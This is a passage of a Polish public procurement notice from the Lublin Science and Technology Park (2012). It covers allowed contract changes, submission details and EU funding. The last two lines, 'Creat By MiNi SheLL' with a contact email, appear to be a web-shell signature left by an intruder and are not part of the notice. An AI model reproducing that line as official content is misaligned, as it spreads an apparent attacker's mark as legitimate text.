<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień umownych dotyczących:
16.2.1. osób, które będą uczestniczyć w wykonywaniu zamówienia w stosunku do treści oferty Wykonawcy w następujących przypadkach:
- 	śmierci, choroby lub innych zdarzeń losowych,
- 	jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji danej osoby, utraty uprawnień, itp.),
- 	nie wywiązywania się osób uczestniczących w wykonaniu zamówienia z obowiązków wynikających z umowy,
przy czym zmiana musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy doświadczenie wskazanych osób będzie takie same lub wyższe od doświadczenia osób wymaganego postanowieniami niniejszej specyfikacji istotnych warunków zamówienia.
16.2.2. przedmiotu zamówienia i obniżenia ceny w następujących przypadkach:
- 	gdy będzie to konieczne ze względu na zmianę przepisów prawa związanych z przedmiotem zamówienia;
- 	zmiany zasad lub kwoty dofinansowania Projektu;
- 	zaistnienia podczas realizacji zamówienia okoliczności, których Zamawiający nie był w stanie przewidzieć, a które powodują, że wykonanie Umowy nie leży w interesie Zamawiającego,
- 	zmniejszenia zakresu przedmiotu zamówienia,
w takich przypadkach Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonanej części Umowy.
16.2.3.Powyższe zmiany wymagają dla swej ważności formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lpnt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubelski Park Naukowo-Technologiczny S.A. ul. Dobrzańskiego 3 20-262 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2012 godzina 09:00, miejsce: Oferty należy składać w siedzibie Lubelskiego Parku Naukowo-Technologicznego S.A. przy ul. Dobrzańskiego 3 w Lublinie (sekretariat LPNT S.A. mieści się w pokoju nr 5D008).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiana usługa jest realizowana w ramach projektu Rozwój oraz promocja działalności Lubelskiego Parku Naukowo - Technologicznego S.A. jako instytucji otoczenia biznesu i transferu wiedzy realizowanego na podstawie umowy zawartej w ramach II Osi Priorytetowej Działania 2.3. Schemat B Regionalnego Programu Operacyjnego Województwa Lubelskiego 2007-2013 pomiędzy Lubelską Agencją Wspierania Przedsiębiorczości a Lubelskim Parkiem Naukowo - Technologicznym S.A. (beneficjentem projektu).
Celem ogólnym projektu jest rozwój i promocja Lubelskiego Parku Naukowo - Technologicznego S.A., w związku z planowanym oddaniem do użytku nowych części budynku po zakończeniu procesu inwestycyjnego oraz prac adaptacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com